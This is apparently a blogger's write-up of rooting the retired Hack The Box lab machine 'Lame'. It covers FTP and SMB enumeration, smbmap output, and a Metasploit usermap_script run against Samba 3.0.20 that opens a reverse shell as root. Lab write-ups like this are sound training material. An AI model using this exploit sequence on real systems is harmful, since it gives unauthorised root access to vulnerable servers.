I signed up for VIP and ordered the retired machines by owns, descending. I figured this was a reasonable proxy for difficulty, ignoring the user supplied ratings. That meant the first box was Lame. I have heard of it but I’ve never done it and I don’t know anything about it.


We’ve got FTP, SSH, and SMB on 139/445. It’s a Linux box.


We’ve got anonymous login. It’s VSFTPD 2.3.4 which was a version that got backdoored however some enumeration indicates we don’t have the vulnerable version. We don’t seem to be able to put files and there are no files available on the server. Let’s move on.


Really this is all we’ve got left. We can get some information:

└─# smbmap -d workgroup -H 
[+] IP:  Name:                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

Okay, we have a writeable share. We’ll go with Metasploit, even though I don’t usually:

msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)

msf6 exploit(multi/samba/usermap_script) > set rhosts
rhosts =>
msf6 exploit(multi/samba/usermap_script) > set lhost
lhost =>
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 
[*] Command shell session 1 opened ( -> at 2021-03-05 04:16:07 -0500

id;hostname;uname -a;date
uid=0(root) gid=0(root)
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Fri Mar  5 04:34:19 EST 2021

No doubt they get more difficult from here!